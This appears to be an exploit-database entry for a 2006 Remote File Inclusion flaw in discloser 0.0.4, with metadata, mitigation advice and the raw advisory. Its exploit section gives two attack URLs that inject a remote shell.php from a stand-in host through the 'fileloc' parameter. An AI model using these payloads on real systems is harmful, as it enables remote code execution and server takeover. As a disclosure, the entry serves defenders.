discloser 0.0.4 Remote File Inclusion Vulnerability

vendor:

discloser

by:

Arash RJ

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: discloser

Affected Version From: 0.0.4

Affected Version To: 0.0.4

Patch Exists: Yes

Related CWE: N/A

CPE: a:discloser:discloser:0.0.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

discloser 0.0.4 Remote File Inclusion Vulnerability

A Remote File Inclusion (RFI) vulnerability exists in discloser 0.0.4. An attacker can exploit this vulnerability to include a remote file, such as a malicious PHP script, and execute it on the vulnerable system. The vulnerable parameters are 'fileloc' in 'content/content.php' and 'inc/indexhead.php' scripts.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to discloser 0.0.5 or later.

Source

Exploit-DB raw data:

|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
| discloser 0.0.4 Remote File Inclusion Vulnerability
|
| Download: http://optusnet.dl.sourceforge.net/sourceforge/discloser/discloser-0.0.4.tar.gz
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|Contact|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
| Discoverd by: Arash RJ
|
| Team: PersianFox Digital Security Team
|
| URL: http://www.PersianFox.com
|
| E-Mail: arashrj@gmail.com
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|Exploit|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
| http://[Target]/[Path]/content/content.php?fileloc=http://www.evalsite.com/shell.php?
|
| http://[Target]/[Path]/inc/indexhead.php?fileloc= http://www.evalsite.com/shell.php?
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|

# milw0rm.com [2006-08-15]